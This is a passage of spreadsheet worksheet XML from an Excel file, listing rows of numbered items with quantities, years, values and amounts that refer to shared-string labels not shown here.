      <c r="H114" s="11">
        <v>2</v>
      </c>
      <c r="I114" s="11">
        <v>2006</v>
      </c>
      <c r="J114" s="190"/>
      <c r="K114" s="188">
        <v>400</v>
      </c>
      <c r="L114" s="246" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="2:12">
      <c r="B115" s="16">
        <v>77</v>
      </c>
      <c r="C115" s="16"/>
      <c r="D115" s="10" t="s">
        <v>2168</v>
      </c>
      <c r="E115" s="10"/>
      <c r="F115" s="11" t="s">
        <v>2169</v>
      </c>
      <c r="G115" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H115" s="11">
        <v>1</v>
      </c>
      <c r="I115" s="11">
        <v>2006</v>
      </c>
      <c r="J115" s="190"/>
      <c r="K115" s="188">
        <v>2000</v>
      </c>
      <c r="L115" s="246" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="2:12">
      <c r="B116" s="16">
        <v>78</v>
      </c>
      <c r="C116" s="237" t="s">
        <v>2170</v>
      </c>
      <c r="D116" s="238" t="s">
        <v>2063</v>
      </c>
      <c r="E116" s="238" t="s">
        <v>2171</v>
      </c>
      <c r="F116" s="11"/>
      <c r="G116" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H116" s="11">
        <v>1</v>
      </c>
      <c r="I116" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J116" s="190">
        <v>840</v>
      </c>
      <c r="K116" s="188">
        <v>33.6</v>
      </c>
      <c r="L116" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="2:12">
      <c r="B117" s="16">
        <v>79</v>
      </c>
      <c r="C117" s="237" t="s">
        <v>2173</v>
      </c>
      <c r="D117" s="238" t="s">
        <v>2174</v>
      </c>
      <c r="E117" s="238" t="s">
        <v>2175</v>
      </c>
      <c r="F117" s="11"/>
      <c r="G117" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H117" s="11">
        <v>37</v>
      </c>
      <c r="I117" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J117" s="190">
        <v>740</v>
      </c>
      <c r="K117" s="188">
        <v>1036</v>
      </c>
      <c r="L117" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="2:12">
      <c r="B118" s="16">
        <v>80</v>
      </c>
      <c r="C118" s="237" t="s">
        <v>2176</v>
      </c>
      <c r="D118" s="238" t="s">
        <v>2177</v>
      </c>
      <c r="E118" s="238" t="s">
        <v>2178</v>
      </c>
      <c r="F118" s="11"/>
      <c r="G118" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H118" s="11">
        <v>2</v>
      </c>
      <c r="I118" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J118" s="192">
        <v>53900</v>
      </c>
      <c r="K118" s="188">
        <v>2156</v>
      </c>
      <c r="L118" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="2:12">
      <c r="B119" s="16">
        <v>81</v>
      </c>
      <c r="C119" s="237" t="s">
        <v>2179</v>
      </c>
      <c r="D119" s="238" t="s">
        <v>2177</v>
      </c>
      <c r="E119" s="238" t="s">
        <v>764</v>
      </c>
      <c r="F119" s="11"/>
      <c r="G119" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H119" s="11">
        <v>1</v>
      </c>
      <c r="I119" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J119" s="192">
        <v>28500</v>
      </c>
      <c r="K119" s="188">
        <v>1140</v>
      </c>
      <c r="L119" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="2:12">
      <c r="B120" s="16">
        <v>82</v>
      </c>
      <c r="C120" s="237" t="s">
        <v>2180</v>
      </c>
      <c r="D120" s="238" t="s">
        <v>2177</v>
      </c>
      <c r="E120" s="238" t="s">
        <v>2181</v>
      </c>
      <c r="F120" s="11"/>
      <c r="G120" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H120" s="11">
        <v>1</v>
      </c>
      <c r="I120" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J120" s="192">
        <v>23500</v>
      </c>
      <c r="K120" s="188">
        <v>940</v>
      </c>
      <c r="L120" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="2:12">
      <c r="B121" s="16">
        <v>83</v>
      </c>
      <c r="C121" s="237" t="s">
        <v>2182</v>
      </c>
      <c r="D121" s="238" t="s">
        <v>2126</v>
      </c>
      <c r="E121" s="238" t="s">
        <v>2183</v>
      </c>
      <c r="F121" s="11"/>
      <c r="G121" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H121" s="11">
        <v>1</v>
      </c>
      <c r="I121" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J121" s="192">
        <v>1300</v>
      </c>
      <c r="K121" s="188">
        <v>52</v>
      </c>
      <c r="L121" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="2:12">
      <c r="B122" s="16">
        <v>84</v>
      </c>
      <c r="C122" s="237" t="s">
        <v>2184</v>
      </c>
      <c r="D122" s="238" t="s">
        <v>2065</v>
      </c>
      <c r="E122" s="238" t="s">
        <v>2185</v>
      </c>
      <c r="F122" s="11"/>
      <c r="G122" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H122" s="11">
        <v>4</v>
      </c>
      <c r="I122" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J122" s="192">
        <v>45000</v>
      </c>
      <c r="K122" s="188">
        <v>1800</v>
      </c>
      <c r="L122" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="2:12">
      <c r="B123" s="16">
        <v>85</v>
      </c>
      <c r="C123" s="237" t="s">
        <v>2186</v>
      </c>
      <c r="D123" s="238" t="s">
        <v>1942</v>
      </c>
      <c r="E123" s="238" t="s">
        <v>2187</v>
      </c>
      <c r="F123" s="11"/>
      <c r="G123" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H123" s="11">
        <v>2</v>
      </c>
      <c r="I123" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J123" s="192">
        <v>29900</v>
      </c>
      <c r="K123" s="188">
        <v>1196</v>
      </c>
      <c r="L123" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="124" customHeight="1" spans="2:12">
      <c r="B124" s="16">
        <v>86</v>
      </c>
      <c r="C124" s="237" t="s">
        <v>2188</v>
      </c>
      <c r="D124" s="238" t="s">
        <v>1942</v>
      </c>
      <c r="E124" s="238" t="s">
        <v>2181</v>
      </c>
      <c r="F124" s="11"/>
      <c r="G124" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H124" s="11">
        <v>2</v>
      </c>
      <c r="I124" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J124" s="192">
        <v>36630</v>
      </c>
      <c r="K124" s="188">
        <v>1465.2</v>
      </c>
      <c r="L124" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="125" customHeight="1" spans="2:12">
      <c r="B125" s="16">
        <v>87</v>
      </c>
      <c r="C125" s="237" t="s">
        <v>2189</v>
      </c>
      <c r="D125" s="238" t="s">
        <v>2057</v>
      </c>
      <c r="E125" s="238" t="s">
        <v>2190</v>
      </c>
      <c r="F125" s="11"/>
      <c r="G125" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H125" s="11">
        <v>4</v>
      </c>
      <c r="I125" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J125" s="192">
        <v>19000</v>
      </c>
      <c r="K125" s="188">
        <v>1360</v>
      </c>
      <c r="L125" s="246" t="s">
        <v>2172</v>
      </c>
    </row>
    <row r="126" customHeight="1" spans="2:12">
      <c r="B126" s="16">
        <v>88</v>
      </c>
      <c r="C126" s="237" t="s">
        <v>2191</v>
      </c>
      <c r="D126" s="238" t="s">
        <v>2192</v>
      </c>
      <c r="E126" s="238" t="s">
        <v>2193</v>
      </c>
      <c r="F126" s="16"/>
      <c r="G126" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H126" s="11">
        <v>1</v>
      </c>
      <c r="I126" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J126" s="192">
        <v>2000</v>
      </c>
      <c r="K126" s="188">
        <v>0</v>
      </c>
      <c r="L126" s="239" t="s">
        <v>2194</v>
      </c>
    </row>
    <row r="127" customHeight="1" spans="2:12">
      <c r="B127" s="16">
        <v>89</v>
      </c>
      <c r="C127" s="237" t="s">
        <v>2195</v>
      </c>
      <c r="D127" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E127" s="238" t="s">
        <v>2196</v>
      </c>
      <c r="F127" s="11"/>
      <c r="G127" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H127" s="11">
        <v>1</v>
      </c>
      <c r="I127" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J127" s="192">
        <v>7500</v>
      </c>
      <c r="K127" s="188">
        <v>300</v>
      </c>
      <c r="L127" s="239" t="s">
        <v>2194</v>
      </c>
    </row>
    <row r="128" customHeight="1" spans="2:12">
      <c r="B128" s="16">
        <v>90</v>
      </c>
      <c r="C128" s="237" t="s">
        <v>2197</v>
      </c>
      <c r="D128" s="238" t="s">
        <v>2050</v>
      </c>
      <c r="E128" s="238" t="s">
        <v>2198</v>
      </c>
      <c r="F128" s="16"/>
      <c r="G128" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H128" s="11">
        <v>6</v>
      </c>
      <c r="I128" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J128" s="192">
        <v>10300</v>
      </c>
      <c r="K128" s="188">
        <v>0</v>
      </c>
      <c r="L128" s="239" t="s">
        <v>2194</v>
      </c>
    </row>
    <row r="129" customHeight="1" spans="2:12">
      <c r="B129" s="16">
        <v>91</v>
      </c>
      <c r="C129" s="237" t="s">
        <v>2199</v>
      </c>
      <c r="D129" s="238" t="s">
        <v>2200</v>
      </c>
      <c r="E129" s="238" t="s">
        <v>2201</v>
      </c>
      <c r="F129" s="16"/>
      <c r="G129" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H129" s="11">
        <v>2</v>
      </c>
      <c r="I129" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J129" s="192">
        <v>5200</v>
      </c>
      <c r="K129" s="188">
        <v>0</v>
      </c>
      <c r="L129" s="239" t="s">
        <v>2194</v>
      </c>
    </row>
    <row r="130" customHeight="1" spans="2:12">
      <c r="B130" s="16">
        <v>92</v>
      </c>
      <c r="C130" s="237" t="s">
        <v>2202</v>
      </c>
      <c r="D130" s="238" t="s">
        <v>2203</v>
      </c>
      <c r="E130" s="238" t="s">
        <v>2201</v>
      </c>
      <c r="F130" s="16"/>
      <c r="G130" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H130" s="11">
        <v>1</v>
      </c>
      <c r="I130" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J130" s="192">
        <v>3500</v>
      </c>
      <c r="K130" s="188">
        <v>0</v>
      </c>
      <c r="L130" s="239" t="s">
        <v>2194</v>
      </c>
    </row>
    <row r="131" customHeight="1" spans="2:12">
      <c r="B131" s="16">
        <v>93</v>
      </c>
      <c r="C131" s="16"/>
      <c r="D131" s="10" t="s">
        <v>2204</v>
      </c>
      <c r="E131" s="10"/>
      <c r="F131" s="11"/>
      <c r="G131" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H131" s="11">
        <v>26</v>
      </c>
      <c r="I131" s="11"/>
      <c r="J131" s="190"/>
      <c r="K131" s="188">
        <v>8320</v>
      </c>
      <c r="L131" s="239" t="s">
        <v>2194</v>
      </c>
    </row>
    <row r="132" customHeight="1" spans="2:12">
      <c r="B132" s="16">
        <v>94</v>
      </c>
      <c r="C132" s="237" t="s">
        <v>2205</v>
      </c>
      <c r="D132" s="238" t="s">
        <v>2076</v>
      </c>
      <c r="E132" s="238" t="s">
        <v>2206</v>
      </c>
      <c r="F132" s="11"/>
      <c r="G132" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H132" s="11">
        <v>3</v>
      </c>
      <c r="I132" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J132" s="192">
        <v>11000</v>
      </c>
      <c r="K132" s="188">
        <v>330</v>
      </c>
      <c r="L132" s="239" t="s">
        <v>2207</v>
      </c>
    </row>
    <row r="133" customHeight="1" spans="2:12">
      <c r="B133" s="16">
        <v>95</v>
      </c>
      <c r="C133" s="237" t="s">
        <v>2208</v>
      </c>
      <c r="D133" s="238" t="s">
        <v>2209</v>
      </c>
      <c r="E133" s="238" t="s">
        <v>2055</v>
      </c>
      <c r="F133" s="11"/>
      <c r="G133" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H133" s="11">
        <v>1</v>
      </c>
      <c r="I133" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J133" s="192">
        <v>2800</v>
      </c>
      <c r="K133" s="188">
        <v>112</v>
      </c>
      <c r="L133" s="239" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="134" customHeight="1" spans="2:12">
      <c r="B134" s="16">
        <v>96</v>
      </c>
      <c r="C134" s="237" t="s">
        <v>2210</v>
      </c>
      <c r="D134" s="238" t="s">
        <v>2211</v>
      </c>
      <c r="E134" s="238" t="s">
        <v>2212</v>
      </c>
      <c r="F134" s="11"/>
      <c r="G134" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H134" s="11">
        <v>2</v>
      </c>
      <c r="I134" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J134" s="192">
        <v>6600</v>
      </c>
      <c r="K134" s="188">
        <v>264</v>
      </c>
      <c r="L134" s="239" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="135" customHeight="1" spans="2:12">
      <c r="B135" s="16">
        <v>97</v>
      </c>
      <c r="C135" s="237" t="s">
        <v>2213</v>
      </c>
      <c r="D135" s="238" t="s">
        <v>2214</v>
      </c>
      <c r="E135" s="238" t="s">
        <v>2215</v>
      </c>
      <c r="F135" s="16"/>
      <c r="G135" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H135" s="11">
        <v>10</v>
      </c>
      <c r="I135" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J135" s="192">
        <v>19200</v>
      </c>
      <c r="K135" s="188">
        <v>0</v>
      </c>
      <c r="L135" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="136" customHeight="1" spans="2:12">
      <c r="B136" s="16">
        <v>98</v>
      </c>
      <c r="C136" s="237" t="s">
        <v>2216</v>
      </c>
      <c r="D136" s="238" t="s">
        <v>2217</v>
      </c>
      <c r="E136" s="238" t="s">
        <v>2218</v>
      </c>
      <c r="F136" s="16"/>
      <c r="G136" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H136" s="11">
        <v>4</v>
      </c>
      <c r="I136" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J136" s="192">
        <v>4540</v>
      </c>
      <c r="K136" s="188">
        <v>0</v>
      </c>
      <c r="L136" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="137" customHeight="1" spans="2:12">
      <c r="B137" s="16">
        <v>99</v>
      </c>
      <c r="C137" s="237" t="s">
        <v>2219</v>
      </c>
      <c r="D137" s="238" t="s">
        <v>2203</v>
      </c>
      <c r="E137" s="238" t="s">
        <v>2220</v>
      </c>
      <c r="F137" s="16"/>
      <c r="G137" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H137" s="11">
        <v>15</v>
      </c>
      <c r="I137" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J137" s="192">
        <v>48300</v>
      </c>
      <c r="K137" s="188">
        <v>0</v>
      </c>
      <c r="L137" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="138" customHeight="1" spans="2:12">
      <c r="B138" s="16">
        <v>100</v>
      </c>
      <c r="C138" s="237" t="s">
        <v>2221</v>
      </c>
      <c r="D138" s="238" t="s">
        <v>2222</v>
      </c>
      <c r="E138" s="238" t="s">
        <v>2223</v>
      </c>
      <c r="F138" s="16"/>
      <c r="G138" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H138" s="11">
        <v>15</v>
      </c>
      <c r="I138" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J138" s="192">
        <v>14700</v>
      </c>
      <c r="K138" s="188">
        <v>0</v>
      </c>
      <c r="L138" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="139" customHeight="1" spans="2:12">
      <c r="B139" s="16">
        <v>101</v>
      </c>
      <c r="C139" s="237" t="s">
        <v>2224</v>
      </c>
      <c r="D139" s="238" t="s">
        <v>2057</v>
      </c>
      <c r="E139" s="238" t="s">
        <v>2225</v>
      </c>
      <c r="F139" s="16"/>
      <c r="G139" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H139" s="11">
        <v>15</v>
      </c>
      <c r="I139" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J139" s="192">
        <v>47100</v>
      </c>
      <c r="K139" s="188">
        <v>0</v>
      </c>
      <c r="L139" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="140" customHeight="1" spans="2:12">
      <c r="B140" s="16">
        <v>102</v>
      </c>
      <c r="C140" s="237" t="s">
        <v>2226</v>
      </c>
      <c r="D140" s="238" t="s">
        <v>2071</v>
      </c>
      <c r="E140" s="238" t="s">
        <v>2227</v>
      </c>
      <c r="F140" s="16"/>
      <c r="G140" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H140" s="11">
        <v>9</v>
      </c>
      <c r="I140" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J140" s="192">
        <v>6600</v>
      </c>
      <c r="K140" s="188">
        <v>0</v>
      </c>
      <c r="L140" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="141" customHeight="1" spans="2:12">
      <c r="B141" s="16">
        <v>103</v>
      </c>
      <c r="C141" s="237" t="s">
        <v>2228</v>
      </c>
      <c r="D141" s="238" t="s">
        <v>2229</v>
      </c>
      <c r="E141" s="238" t="s">
        <v>2230</v>
      </c>
      <c r="F141" s="16"/>
      <c r="G141" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H141" s="11">
        <v>13</v>
      </c>
      <c r="I141" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J141" s="192">
        <v>35000</v>
      </c>
      <c r="K141" s="188">
        <v>0</v>
      </c>
      <c r="L141" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="142" customHeight="1" spans="2:12">
      <c r="B142" s="16">
        <v>104</v>
      </c>
      <c r="C142" s="237" t="s">
        <v>2231</v>
      </c>
      <c r="D142" s="238" t="s">
        <v>2079</v>
      </c>
      <c r="E142" s="238" t="s">
        <v>2232</v>
      </c>
      <c r="F142" s="16"/>
      <c r="G142" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H142" s="11">
        <v>3</v>
      </c>
      <c r="I142" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J142" s="192">
        <v>10000</v>
      </c>
      <c r="K142" s="188">
        <v>0</v>
      </c>
      <c r="L142" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="143" customHeight="1" spans="2:12">
      <c r="B143" s="16">
        <v>105</v>
      </c>
      <c r="C143" s="237" t="s">
        <v>2233</v>
      </c>
      <c r="D143" s="238" t="s">
        <v>2234</v>
      </c>
      <c r="E143" s="238" t="s">
        <v>2227</v>
      </c>
      <c r="F143" s="16"/>
      <c r="G143" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H143" s="11">
        <v>2</v>
      </c>
      <c r="I143" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J143" s="192">
        <v>50000</v>
      </c>
      <c r="K143" s="188">
        <v>0</v>
      </c>
      <c r="L143" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="144" customHeight="1" spans="2:12">
      <c r="B144" s="16">
        <v>106</v>
      </c>
      <c r="C144" s="16"/>
      <c r="D144" s="10" t="s">
        <v>2065</v>
      </c>
      <c r="E144" s="10"/>
      <c r="F144" s="11"/>
      <c r="G144" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H144" s="11">
        <v>5</v>
      </c>
      <c r="I144" s="182">
        <v>1976</v>
      </c>
      <c r="J144" s="193"/>
      <c r="K144" s="188">
        <v>2000</v>
      </c>
      <c r="L144" s="239" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="145" customHeight="1" spans="2:12">
      <c r="B145" s="16">
        <v>107</v>
      </c>
      <c r="C145" s="16"/>
      <c r="D145" s="10" t="s">
        <v>2235</v>
      </c>
      <c r="E145" s="10"/>
      <c r="F145" s="11"/>
      <c r="G145" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H145" s="11">
        <v>2</v>
      </c>
      <c r="I145" s="11">
        <v>1992</v>
      </c>
      <c r="J145" s="190"/>
      <c r="K145" s="188">
        <v>1200</v>
      </c>
      <c r="L145" s="239" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="146" customHeight="1" spans="2:12">
      <c r="B146" s="16">
        <v>108</v>
      </c>
      <c r="C146" s="16"/>
      <c r="D146" s="10" t="s">
        <v>2124</v>
      </c>
      <c r="E146" s="10"/>
      <c r="F146" s="11"/>
      <c r="G146" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H146" s="11">
        <v>6</v>
      </c>
      <c r="I146" s="11">
        <v>2014</v>
      </c>
      <c r="J146" s="190"/>
      <c r="K146" s="188">
        <v>11520</v>
      </c>
      <c r="L146" s="239" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="147" customHeight="1" spans="2:12">
      <c r="B147" s="16">
        <v>109</v>
      </c>
      <c r="C147" s="16"/>
      <c r="D147" s="10" t="s">
        <v>2071</v>
      </c>
      <c r="E147" s="10"/>
      <c r="F147" s="11"/>
      <c r="G147" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H147" s="11">
        <v>2</v>
      </c>
      <c r="I147" s="11" t="s">
        <v>2236</v>
      </c>
      <c r="J147" s="190"/>
      <c r="K147" s="188">
        <v>80</v>
      </c>
      <c r="L147" s="239" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="148" customHeight="1" spans="2:12">
      <c r="B148" s="16">
        <v>110</v>
      </c>
      <c r="C148" s="237" t="s">
        <v>2237</v>
      </c>
      <c r="D148" s="238" t="s">
        <v>2238</v>
      </c>
      <c r="E148" s="238" t="s">
        <v>2239</v>
      </c>
      <c r="F148" s="11"/>
      <c r="G148" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H148" s="11">
        <v>7</v>
      </c>
      <c r="I148" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J148" s="192">
        <v>4100</v>
      </c>
      <c r="K148" s="188">
        <v>1120</v>
      </c>
      <c r="L148" s="246" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="149" customHeight="1" spans="2:12">
      <c r="B149" s="16">
        <v>111</v>
      </c>
      <c r="C149" s="237" t="s">
        <v>2240</v>
      </c>
      <c r="D149" s="238" t="s">
        <v>1942</v>
      </c>
      <c r="E149" s="238" t="s">
        <v>2241</v>
      </c>
      <c r="F149" s="11"/>
      <c r="G149" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H149" s="11">
        <v>5</v>
      </c>
      <c r="I149" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J149" s="192">
        <v>20800</v>
      </c>
      <c r="K149" s="188">
        <v>680</v>
      </c>
      <c r="L149" s="246" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="150" customHeight="1" spans="2:12">
      <c r="B150" s="16">
        <v>112</v>
      </c>
      <c r="C150" s="237" t="s">
        <v>2242</v>
      </c>
      <c r="D150" s="238" t="s">
        <v>2009</v>
      </c>
      <c r="E150" s="238" t="s">
        <v>2243</v>
      </c>
      <c r="F150" s="11"/>
      <c r="G150" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H150" s="11">
        <v>7</v>
      </c>
      <c r="I150" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J150" s="192">
        <v>4700</v>
      </c>
      <c r="K150" s="188">
        <v>263.2</v>
      </c>
      <c r="L150" s="246" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="151" customHeight="1" spans="2:12">
      <c r="B151" s="16">
        <v>113</v>
      </c>
      <c r="C151" s="237" t="s">
        <v>2244</v>
      </c>
      <c r="D151" s="238" t="s">
        <v>2245</v>
      </c>
      <c r="E151" s="238" t="s">
        <v>2246</v>
      </c>
      <c r="F151" s="16"/>
      <c r="G151" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H151" s="11">
        <v>15</v>
      </c>
      <c r="I151" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J151" s="192">
        <v>14600</v>
      </c>
      <c r="K151" s="188">
        <v>0</v>
      </c>
      <c r="L151" s="239" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="152" customHeight="1" spans="2:12">
      <c r="B152" s="16">
        <v>114</v>
      </c>
      <c r="C152" s="237" t="s">
        <v>2247</v>
      </c>
      <c r="D152" s="238" t="s">
        <v>1952</v>
      </c>
      <c r="E152" s="238" t="s">
        <v>2248</v>
      </c>
      <c r="F152" s="11"/>
      <c r="G152" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H152" s="11">
        <v>1</v>
      </c>
      <c r="I152" s="247" t="s">
        <v>229</v>
      </c>
      <c r="J152" s="195">
        <v>14200</v>
      </c>
      <c r="K152" s="188">
        <v>568</v>
      </c>
      <c r="L152" s="246" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="153" customHeight="1" spans="2:12">
      <c r="B153" s="16">
        <v>115</v>
      </c>
      <c r="C153" s="237" t="s">
        <v>2249</v>
      </c>
      <c r="D153" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E153" s="238" t="s">
        <v>1960</v>
      </c>
      <c r="F153" s="11"/>
      <c r="G153" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H153" s="11">
        <v>1</v>
      </c>
      <c r="I153" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J153" s="192">
        <v>11000</v>
      </c>
      <c r="K153" s="188">
        <v>440</v>
      </c>
      <c r="L153" s="246" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="154" s="175" customFormat="1" customHeight="1" spans="2:12">
      <c r="B154" s="16">
        <v>116</v>
      </c>
      <c r="C154" s="237" t="s">
        <v>2250</v>
      </c>
      <c r="D154" s="238" t="s">
        <v>1952</v>
      </c>
      <c r="E154" s="238" t="s">
        <v>2251</v>
      </c>
      <c r="F154" s="11"/>
      <c r="G154" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H154" s="11">
        <v>3</v>
      </c>
      <c r="I154" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J154" s="192">
        <v>15400</v>
      </c>
      <c r="K154" s="188">
        <v>616</v>
      </c>
      <c r="L154" s="246" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="155" customHeight="1" spans="2:12">
      <c r="B155" s="16">
        <v>117</v>
      </c>
      <c r="C155" s="237" t="s">
        <v>2252</v>
      </c>
      <c r="D155" s="238" t="s">
        <v>1952</v>
      </c>
      <c r="E155" s="10" t="s">
        <v>2253</v>
      </c>
      <c r="F155" s="11"/>
      <c r="G155" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H155" s="11">
        <v>4</v>
      </c>
      <c r="I155" s="11">
        <v>2005</v>
      </c>
      <c r="J155" s="190">
        <v>160000</v>
      </c>
      <c r="K155" s="188">
        <v>512</v>
      </c>
      <c r="L155" s="246" t="s">
        <v>1335</v>
      </c>
    </row>
    <row r="156" customHeight="1" spans="2:12">
      <c r="B156" s="16">
        <v>118</v>
      </c>
      <c r="C156" s="237" t="s">
        <v>2254</v>
      </c>
      <c r="D156" s="238" t="s">
        <v>2255</v>
      </c>
      <c r="E156" s="238" t="s">
        <v>2256</v>
      </c>
      <c r="F156" s="11"/>
      <c r="G156" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H156" s="11">
        <v>5</v>
      </c>
      <c r="I156" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J156" s="192">
        <v>11100</v>
      </c>
      <c r="K156" s="188">
        <v>252</v>
      </c>
      <c r="L156" s="246" t="s">
        <v>2257</v>
      </c>
    </row>
    <row r="157" customHeight="1" spans="2:12">
      <c r="B157" s="16">
        <v>119</v>
      </c>
      <c r="C157" s="237" t="s">
        <v>2258</v>
      </c>
      <c r="D157" s="238" t="s">
        <v>2259</v>
      </c>
      <c r="E157" s="238" t="s">
        <v>2198</v>
      </c>
      <c r="F157" s="11"/>
      <c r="G157" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H157" s="11">
        <v>1</v>
      </c>
      <c r="I157" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J157" s="192">
        <v>5200</v>
      </c>
      <c r="K157" s="188">
        <v>208</v>
      </c>
      <c r="L157" s="246" t="s">
        <v>2260</v>
      </c>
    </row>
    <row r="158" customHeight="1" spans="2:12">
      <c r="B158" s="16">
        <v>120</v>
      </c>
      <c r="C158" s="237" t="s">
        <v>2261</v>
      </c>
      <c r="D158" s="238" t="s">
        <v>2262</v>
      </c>
      <c r="E158" s="10"/>
      <c r="F158" s="11"/>
      <c r="G158" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H158" s="11">
        <v>1</v>
      </c>
      <c r="I158" s="237" t="s">
        <v>2263</v>
      </c>
      <c r="J158" s="192">
        <v>326000</v>
      </c>
      <c r="K158" s="188">
        <v>26080</v>
      </c>
      <c r="L158" s="246" t="s">
        <v>2264</v>
      </c>
    </row>
    <row r="159" customHeight="1" spans="2:12">
      <c r="B159" s="16"/>
      <c r="C159" s="11"/>
      <c r="D159" s="10" t="s">
        <v>2265</v>
      </c>
      <c r="E159" s="10"/>
      <c r="F159" s="11"/>
      <c r="G159" s="16"/>
